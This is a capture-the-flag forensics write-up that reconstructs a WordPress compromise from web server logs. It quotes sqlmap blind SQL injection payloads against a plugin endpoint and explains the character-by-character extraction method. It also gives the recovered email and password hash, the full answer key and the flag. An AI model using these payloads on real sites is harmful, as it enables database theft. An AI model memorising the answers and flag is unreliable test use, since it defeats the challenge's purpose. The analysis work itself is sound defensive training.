Log

description
Author: daffainfo
My website has been hacked. Please help me answer the provided questions using the available logs!
Attachments
unzip log_log-dist.zip
# Archive: log_log-dist.zip
# inflating: dist-log.zip
unzip dist-log.zip
# Archive: dist-log.zip
# inflating: error.log
# inflating: access.log
Connect to Netcat Challenge
To see the questions and try answers, connect with netcat to the challenge server on the given port.
nc challenges.1pc.tf <port>
Since we have to answer several questions, we can try answering them all at once by supplying newline-separated (\n) input with echo and piping it into netcat, like this:
echo -e "182.8.97.244\njawabanno2" | nc challenges.1pc.tf 24868
This helps automate sending answers to the challenge server, especially when there are many questions to answer. By using
echo -e and \n, we make sure each answer is sent on its own line, in the format the challenge server expects.
Analysis
1. What is the Victim's IP address?
Required Format: 127.0.0.1
Solution
Use the following command to extract every IP address from the log files and sort them uniquely:
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u
Output:
access.log:1.10.1.21
access.log:127.0.0.1
access.log:165.22.125.147
access.log:182.8.97.244
access.log:219.75.27.16
error.log:165.22.125.147
error.log:172.18.0.1
error.log:172.18.0.3
After that, brute-force the IP against the checker, since there are only a few candidates. Note that 1.10.1.21 is not an address at all: the regex also matched the sqlmap version string in the user agent, which is why validating each candidate against the checker is useful.
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | cut -d: -f2 | sort -u
# Brute-force the IP: submit every unique address to the checker until it
# reports "Status: Correct". HOST and PORT must point at the challenge server.
grep -hEo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u | while read -r IP
do
    RESULT=$(printf "%s\n" "$IP" | nc -w 1 "$HOST" "$PORT")
    if echo "$RESULT" | grep -q "Status: Correct"; then
        echo "[+] FOUND Victim IP: $IP"
        break
    else
        echo "[-] Wrong: $IP"
    fi
done
182.8.97.244
2. What is the Attacker's IP address?
Required Format: 127.0.0.1
Solution
Since previously we used the cat command and looked through the log manually, I found an alternative tool, goaccess.
Install goaccess:
sudo apt install goaccess
Use goaccess to analyse the log file and display statistics, including the IP addresses that appear most often:
goaccess access.log --log-format=COMBINED
goaccess access.log --log-format=COMBINED -o report.html
219.75.27.16
3. How many login attempts were made by the attacker?
Required Format: 1337
Solution
Let's grep the login entries in the log file:
grep -i "login" *.log | grep -i post
# but on checking again, we also need to filter for status code 200, because some login attempts may have failed or were only redirects.
grep -i "login" *.log | grep -i post | grep 200
grep -i "login" *.log | grep -i post | grep 200 | wc -l
output:

6
4. Which plugin was affected (Full Name)?
Required Format: -
Solution
Since we know from the earlier log entries that several requests go to /wp-login.php, we can grep for wp-content/plugins to see which plugins the attacker accessed. We also use sed to strip the timestamp and other unneeded information, then sort and uniq to get the list of unique plugins.
cat *.log | grep "wp-content/plugins" | sed 's/\[.*\] //' | sort | uniq
But when I tried answering with easy-quotes, and then easy quotes, the answer turned out to be wrong, so I searched on Google and found the correct plugin name.

Easy Quotes
5. What is the CVE ID?
Required Format: CVE-XXXX-XXXX
Solution
We can look for the CVE ID associated with the Easy Quotes plugin found earlier. Let's search the WPScan plugins website, since it has a fairly complete database of WordPress plugin CVEs.
I finally found the CVE on the following page


CVE-2025-26943
6. Which tool and version were used to exploit the CVE?
Required Format: tool_name/13.3.7
Solution
Since we know the CVE is CVE-2025-26943, a SQL injection CVE, let's check whether there are any log entries related to the tools wpscan or sqlmap.
cat *.log | grep "wpscan" | sed 's/\[.*\] //' | sort | uniq
cat *.log | grep "sqlmap" | sed 's/\[.*\] //' | sort | uniq
sqlmap/1.10.1.21
7. What is the email address obtained by the attacker?
Required Format: r00t@localhost.xyz
Solution
Since we know the attacker used sqlmap to exploit the CVE, they most likely managed to pull the email address out of the database, so let's grep for user_email:
grep "user_email" access.log
output:
219.75.27.16 - - [11/Jan/2026:13:02:18 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E64%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:19 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E96%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E112%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E104%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E100%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E98%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
From the access log it is clear the attacker used sqlmap's time-based blind SQL injection to extract the value of user_email from the wordpress.wp_users table.
Example payload from the log (URL-decoded):
SELECT IFNULL(CAST(user_email AS NCHAR),0x20)
FROM wordpress.wp_users
ORDER BY ID LIMIT 0,1
sqlmap then uses the technique:
ORD(MID(..., position, 1)) > value
to guess the characters one at a time by their ASCII value. The important parts of the log entries:
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>64 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>96 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>112 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>104 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>100 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>98 ...
Those ASCII values are:
64 = @
96 = `
112 = p
104 = h
100 = d
98 = b
Use the following command to extract the ASCII values and turn them into the email string. Note that the sed pattern matches %21%3D (the URL-encoded !=), i.e. the confirmation query sqlmap sends once a character has been narrowed down, not the %3E (>) comparisons shown above: those only narrow the search, and whether each one was true or false is not recorded in the access log.
grep "user_email" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'
output: admin@daffainfo.com
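As an added example (not part of the original write-up), the following Python script does the same reconstruction more robustly for an incident responder: it URL-decodes each request, keeps only the != confirmation probes, and keys each recovered byte by column and character position, so queries that are logged out of order or retried (sqlmap run with several threads) still assemble into the right string. The log lines are constructed to match the shape of the challenge log; treating a confirmed value of 0 as end of string is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample in the challenge log's shape (values made up, not from the
# real access.log): one '>' binary-search probe, then != confirmations for
# user_email positions 1..3 logged out of order with a duplicated retry, and
# one confirmation for user_pass.
def _probe(col, pos, op, val):
    sub = (f"%28SELECT%20IFNULL%28CAST%28{col}%20AS%20NCHAR%29%2C0x20%29%20FROM"
           f"%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29")
    return f"ORD%28MID%28{sub}%2C{pos}%2C1%29%29{op}{val}"

def _line(payload):
    return ('219.75.27.16 - - [11/Jan/2026:13:02:18 +0000] "GET /wp-json/layart/v1/'
            f'fonts?family=1%27%20AND%20{payload}--%20x HTTP/1.1" 200 724 "-" '
            '"sqlmap/1.10.1.21#dev (https://sqlmap.org)"')

SAMPLE_LOG = [_line(_probe("user_email", 1, "%3E", 64)),
              _line(_probe("user_email", 2, "%21%3D", 98)),   # 'b'
              _line(_probe("user_email", 1, "%21%3D", 97)),   # 'a'
              _line(_probe("user_email", 3, "%21%3D", 64)),   # '@'
              _line(_probe("user_email", 3, "%21%3D", 64)),   # retry
              _line(_probe("user_pass", 1, "%21%3D", 36))]    # '$'

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# column, character position, comparison operator, ASCII value
PROBE = re.compile(r"CAST\((\w+) AS NCHAR\).*?\),(\d+),1\)\)(!=|>)(\d+)")

def reconstruct(lines):
    """Return {column: recovered string} built from != confirmation probes."""
    chars = {}                                   # column -> {position: char}
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        for col, pos, op, val in PROBE.findall(unquote(m.group(1))):
            if op != "!=":        # '>' steps only narrow the search; the log does
                continue          # not record whether each one was true or false
            if int(val) == 0:     # assumption: a confirmed NUL marks end of string
                continue
            chars.setdefault(col, {})[int(pos)] = chr(int(val))
    # positions never confirmed are shown as '?' so gaps stay visible
    return {col: "".join(found.get(i, "?") for i in range(1, max(found) + 1))
            for col, found in chars.items()}

if __name__ == "__main__":
    for col, value in reconstruct(SAMPLE_LOG).items():
        print(f"{col}: {value}")
```

Run it against the real access.log by replacing SAMPLE_LOG with `open("access.log").read().splitlines()`.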

8. What is the password hash obtained by the attacker?
Required Format: -
Solution
Do the same as before, but this time search for user_pass, since the password hash is normally stored in that field of the WordPress database.
grep "user_pass" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'
output: $wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW
$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW
9. When did the attacker successfully log in?
Required Format: DD/MM/YYYY HH:MM:SS
Solution
Grep for requests to wp-login.php with status code 302 (the redirect after a successful login) to find the timestamp of the successful login.
grep "wp-login.php" access.log | grep " 302"
output:
182.8.97.244 - - [11/Jan/2026:12:25:33 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"
219.75.27.16 - - [11/Jan/2026:13:12:49 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php?redirect_to=http%3A%2F%2F165.22.125.147%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"
11/01/2026 13:12:49
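The login classification used in questions 3 and 9 as a small Python script, added here and not part of the original write-up: it parses Apache combined-format lines, counts POST /wp-login.php responses with status 200 (WordPress re-renders the login form on a failed login) per client address, and records the first 302 (the redirect after a successful login) in the challenge's DD/MM/YYYY HH:MM:SS format. The sample lines are constructed, reusing the two addresses from the log above.

```python
import re
from datetime import datetime

# client, timestamp, method, path, status from an Apache combined log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample (not the challenge log): the legitimate user logs in once,
# the attacker fails twice and then succeeds.
SAMPLE_LOG = """\
182.8.97.244 - - [11/Jan/2026:12:25:33 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "-" "Mozilla/5.0"
219.75.27.16 - - [11/Jan/2026:13:12:40 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
219.75.27.16 - - [11/Jan/2026:13:12:41 +0000] "POST /wp-login.php HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
219.75.27.16 - - [11/Jan/2026:13:12:44 +0000] "POST /wp-login.php HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
219.75.27.16 - - [11/Jan/2026:13:12:49 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "-" "Mozilla/5.0"
219.75.27.16 - - [11/Jan/2026:13:12:50 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

def login_summary(text):
    """Return {ip: {"failed": count, "success_at": "DD/MM/YYYY HH:MM:SS" or None}}."""
    summary = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method != "POST" or path.split("?")[0] != "/wp-login.php":
            continue                       # only login form submissions count
        entry = summary.setdefault(ip, {"failed": 0, "success_at": None})
        if status == "302" and entry["success_at"] is None:
            when = datetime.strptime(ts.split()[0], "%d/%b/%Y:%H:%M:%S")
            entry["success_at"] = when.strftime("%d/%m/%Y %H:%M:%S")
        elif status == "200":
            entry["failed"] += 1
    return summary

def brute_force_suspects(summary, min_failed=2):
    """Addresses that failed at least min_failed times and later succeeded."""
    return sorted(ip for ip, e in summary.items()
                  if e["failed"] >= min_failed and e["success_at"])

if __name__ == "__main__":
    s = login_summary(SAMPLE_LOG)
    for ip in brute_force_suspects(s):
        print(ip, s[ip])
```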
Answer Questions
answers = [
"182.8.97.244",
"219.75.27.16",
"6",
"Easy Quotes",
"CVE-2025-26943",
"sqlmap/1.10.1.21",
"admin@daffainfo.com",
"$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
"11/01/2026 13:12:49"
]
for answer in answers:
    print(answer)

HOST=challenges.1pc.tf
PORT=47693
echo -e "182.8.97.244\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\n" | nc $HOST $PORT
# because the password hash contains the special character `$`, we need to escape it with `\` or use single quotes so the shell does not interpret it.
# but when I tried that it kept failing, so as an alternative I used printf, which is more flexible for sending strings with special characters without worrying about escaping.
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n" | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n11/01/2026 13:12:49\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT
Another alternative is to use Python:
import socket
import sys

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} HOST PORT")
    sys.exit(1)

HOST = sys.argv[1]
PORT = int(sys.argv[2])

s = socket.socket()
s.connect((HOST, PORT))

def recv_until(target):
    """Read one byte at a time until `target` appears, then echo what was read."""
    data = ""
    while target not in data:
        chunk = s.recv(1).decode()
        if not chunk:
            break
        data += chunk
    print(data, end="")
    return data

def send(msg):
    s.sendall((msg + "\n").encode())

# Answers already known to be correct
answers = [
    "182.8.97.244",
    "219.75.27.16",
    "6",
    "Easy Quotes",
    "CVE-2025-26943",
    "sqlmap/1.10.1.21",
    "admin@daffainfo.com",
    "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
    "11/01/2026 13:12:49"
]

# Send the known answers automatically
for ans in answers:
    recv_until("Your Answer:")
    send(ans)

# Enter interactive mode for any new question (Q3, etc.)
while True:
    # Read until the prompt appears
    data = ""
    while True:
        chunk = s.recv(4096).decode()
        if not chunk:           # server closed the connection
            sys.exit(0)
        data += chunk
        print(chunk, end="")
        if "Your Answer:" in data or ":" in data:
            break
    # Take manual input and send it
    user_input = input(">> ")
    send(user_input)

python3 nc_quiz.py $HOST $PORT

flag
C2C{7H15_15_V3rY_345Y_3a4d4f3b57c1}